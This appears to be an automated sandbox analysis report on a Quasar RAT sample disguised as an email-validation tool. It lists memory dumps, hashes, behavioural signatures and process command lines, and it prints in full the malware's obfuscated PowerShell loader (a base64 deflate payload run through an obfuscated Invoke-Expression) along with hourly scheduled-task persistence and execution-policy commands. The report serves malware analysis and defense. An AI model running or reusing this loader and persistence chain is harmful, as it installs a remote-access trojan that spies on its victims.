memory/2504-165-0x000007FEF6850000-0x000007FEF6894000-memory.dmp

memory/2504-166-0x000007FEF5900000-0x000007FEF5A12000-memory.dmp

memory/2340-168-0x000000013F5B0000-0x000000013FBFE000-memory.dmp

memory/2504-169-0x000007FEF6CE0000-0x000007FEF6CF9000-memory.dmp

memory/2504-174-0x000007FEF6840000-0x000007FEF684D000-memory.dmp

memory/320-175-0x000000001B3B0000-0x000000001B692000-memory.dmp

memory/320-176-0x0000000002360000-0x0000000002368000-memory.dmp

memory/320-178-0x0000000002A10000-0x0000000002A90000-memory.dmp

memory/320-177-0x000007FEF4DF0000-0x000007FEF578D000-memory.dmp

memory/320-179-0x000007FEF4DF0000-0x000007FEF578D000-memory.dmp

memory/2504-181-0x000007FEF6810000-0x000007FEF6836000-memory.dmp

memory/320-180-0x0000000002A10000-0x0000000002A90000-memory.dmp

memory/320-182-0x0000000002A10000-0x0000000002A90000-memory.dmp

memory/320-183-0x0000000002A10000-0x0000000002A90000-memory.dmp

memory/320-184-0x000007FEF4DF0000-0x000007FEF578D000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\W2SET6E92JULKA3COC84.temp

MD5 4369be6538d3041286b72edfbcea1314
SHA1 f6edf13289c7124ed262f2dee0cd1fd8eb78bcc4
SHA256 02ecd92a047d05c44975be11d5dca90c8b9abf29acce8ece7dd4c4d299bf5915
SHA512 a8015b7b4fd64b4e2382e77eece696f39fee7a491c34a9d1cf453a5c85c1f95b11d5afb516cca52747922fc42cd676561fc4a0e69272271f4620bdc773590edd

memory/2504-187-0x000000013F5B0000-0x000000013FBFE000-memory.dmp

memory/2504-188-0x000007FEF5FD0000-0x000007FEF6412000-memory.dmp

memory/2504-189-0x000007FEF6D30000-0x000007FEF6D54000-memory.dmp

memory/2504-191-0x000007FEF6D00000-0x000007FEF6D1B000-memory.dmp

memory/2504-193-0x000007FEF6CE0000-0x000007FEF6CF9000-memory.dmp

memory/2504-192-0x000007FEF6850000-0x000007FEF6894000-memory.dmp

memory/2504-196-0x000007FEF5C60000-0x000007FEF5FC9000-memory.dmp

memory/2504-197-0x000007FEF5BA0000-0x000007FEF5C55000-memory.dmp

memory/2504-199-0x000007FEF5AC0000-0x000007FEF5B96000-memory.dmp

memory/2504-200-0x000007FEF67E0000-0x000007FEF67F0000-memory.dmp

memory/2024-203-0x00000000736D0000-0x0000000073C7B000-memory.dmp

memory/2024-204-0x0000000002890000-0x00000000028D0000-memory.dmp

memory/2024-205-0x00000000736D0000-0x0000000073C7B000-memory.dmp

memory/2024-207-0x0000000002890000-0x00000000028D0000-memory.dmp

memory/2024-206-0x0000000002890000-0x00000000028D0000-memory.dmp

memory/2024-213-0x00000000736D0000-0x0000000073C7B000-memory.dmp

memory/2340-214-0x000000013F5B0000-0x000000013FBFE000-memory.dmp

memory/2504-215-0x000000013F5B0000-0x000000013FBFE000-memory.dmp

memory/2504-216-0x000007FEF5FD0000-0x000007FEF6412000-memory.dmp

memory/2504-231-0x000000013F5B0000-0x000000013FBFE000-memory.dmp

memory/2504-232-0x000007FEF5FD0000-0x000007FEF6412000-memory.dmp

memory/2504-233-0x000007FEF6D30000-0x000007FEF6D54000-memory.dmp

memory/2504-234-0x000007FEF6D20000-0x000007FEF6D2F000-memory.dmp

memory/2504-235-0x000007FEF6D00000-0x000007FEF6D1B000-memory.dmp

memory/2504-236-0x000007FEF6850000-0x000007FEF6894000-memory.dmp

memory/2504-237-0x000007FEF6CE0000-0x000007FEF6CF9000-memory.dmp

memory/2504-238-0x000007FEF6840000-0x000007FEF684D000-memory.dmp

memory/2504-239-0x000007FEF6810000-0x000007FEF6836000-memory.dmp

memory/2504-240-0x000007FEF5C60000-0x000007FEF5FC9000-memory.dmp

memory/2504-241-0x000007FEF5BA0000-0x000007FEF5C55000-memory.dmp

memory/2504-242-0x000007FEF67F0000-0x000007FEF67FD000-memory.dmp

memory/2504-243-0x000007FEF5AC0000-0x000007FEF5B96000-memory.dmp

memory/2504-244-0x000007FEF67E0000-0x000007FEF67F0000-memory.dmp

memory/2504-245-0x000007FEF6790000-0x000007FEF67D7000-memory.dmp

memory/2504-246-0x000007FEF5900000-0x000007FEF5A12000-memory.dmp

memory/2340-280-0x000000013F5B0000-0x000000013FBFE000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2023-12-02 14:44

Reported

2023-12-02 14:46

Platform

win10v2004-20231127-en

Max time kernel

69s

Max time network

74s

Command Line

"C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe"

Signatures

Quasar RAT

trojan spyware quasar

Quasar payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ifconfig.me N/A N/A
N/A ifconfig.me N/A N/A
N/A ip-api.com N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4316 set thread context of 3712 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3128 wrote to memory of 2148 N/A C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe
PID 3128 wrote to memory of 2148 N/A C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe
PID 2148 wrote to memory of 4312 N/A C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe C:\Windows\system32\cmd.exe
PID 2148 wrote to memory of 4312 N/A C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe C:\Windows\system32\cmd.exe
PID 4312 wrote to memory of 1724 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 4312 wrote to memory of 1724 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 2148 wrote to memory of 3760 N/A C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe C:\Windows\system32\cmd.exe
PID 2148 wrote to memory of 3760 N/A C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe C:\Windows\system32\cmd.exe
PID 3760 wrote to memory of 3600 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 3760 wrote to memory of 3600 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 2148 wrote to memory of 3332 N/A C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe C:\Windows\system32\cmd.exe
PID 2148 wrote to memory of 3332 N/A C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe C:\Windows\system32\cmd.exe
PID 2148 wrote to memory of 2648 N/A C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe C:\Windows\system32\cmd.exe
PID 2148 wrote to memory of 2648 N/A C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe C:\Windows\system32\cmd.exe
PID 3332 wrote to memory of 4552 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3332 wrote to memory of 4552 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3332 wrote to memory of 3300 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3332 wrote to memory of 3300 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2648 wrote to memory of 4316 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2648 wrote to memory of 4316 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2648 wrote to memory of 4316 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4316 wrote to memory of 2164 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 4316 wrote to memory of 2164 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 4316 wrote to memory of 2164 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 2164 wrote to memory of 1436 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 2164 wrote to memory of 1436 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 2164 wrote to memory of 1436 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 4316 wrote to memory of 3712 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
PID 4316 wrote to memory of 3712 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
PID 4316 wrote to memory of 3712 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
PID 4316 wrote to memory of 3712 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
PID 4316 wrote to memory of 3712 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
PID 4316 wrote to memory of 3712 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
PID 4316 wrote to memory of 3712 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
PID 4316 wrote to memory of 3712 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
PID 2148 wrote to memory of 2972 N/A C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe C:\Windows\system32\cmd.exe
PID 2148 wrote to memory of 2972 N/A C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe C:\Windows\system32\cmd.exe

Uses Task Scheduler COM API

persistence

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe

"C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe"

C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe

"C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "attrib +h "C:\Users\Admin\AppData\Roaming\WindowsAPIwsh\WindowsAPIwsh.vbs""

C:\Windows\system32\attrib.exe

attrib +h "C:\Users\Admin\AppData\Roaming\WindowsAPIwsh\WindowsAPIwsh.vbs"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "schtasks /create /tn WindowsAPIwsh /sc hourly /mo 1 /tr "C:\Users\Admin\AppData\Roaming\WindowsAPIwsh\WindowsAPIwsh.vbs" > NUL 2>&1"

C:\Windows\system32\schtasks.exe

schtasks /create /tn WindowsAPIwsh /sc hourly /mo 1 /tr "C:\Users\Admin\AppData\Roaming\WindowsAPIwsh\WindowsAPIwsh.vbs"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "cmd /C echo Y|powershell Set-ExecutionPolicy Unrestricted -Scope CurrentUser"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Command "( NEW-oBjEct sYSteM.IO.ComPreSsioN.deFLATEsTREAm([SysTEM.iO.MeMORystREAm] [cONVERT]::fRoMBAsE64stRINg( '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') ,[iO.CoMprEssiOn.CoMpREssIoNMoDe]::dEComPresS)|FoReACH-ObjeCT{ NEW-oBjEct Io.sTReAmrEADEr( $_ , [SYsTeM.TEXT.eNcOdInG]::ASCII )}| ForEacH-objeCt {$_.ReadtoEnd( ) }) |. ( $PshOme[21]+$PsHOmE[34]+'x')""

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Command "( NEW-oBjEct sYSteM.IO.ComPreSsioN.deFLATEsTREAm([SysTEM.iO.MeMORystREAm] [cONVERT]::fRoMBAsE64stRINg( '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') ,[iO.CoMprEssiOn.CoMpREssIoNMoDe]::dEComPresS)|FoReACH-ObjeCT{ NEW-oBjEct Io.sTReAmrEADEr( $_ , [SYsTeM.TEXT.eNcOdInG]::ASCII )}| ForEacH-objeCt {$_.ReadtoEnd( ) }) |. ( $PshOme[21]+$PsHOmE[34]+'x')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-ExecutionPolicy Unrestricted -Scope CurrentUser

C:\Windows\system32\cmd.exe

cmd /C echo Y

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\mpms03uf\mpms03uf.cmdline"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES191.tmp" "c:\Users\Admin\AppData\Local\Temp\mpms03uf\CSCFA0F31AEBFE442D38D5F756AE4D6604E.TMP"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 188 -p 4316 -ip 4316

C:\Windows\SysWOW64\WerFault.exe

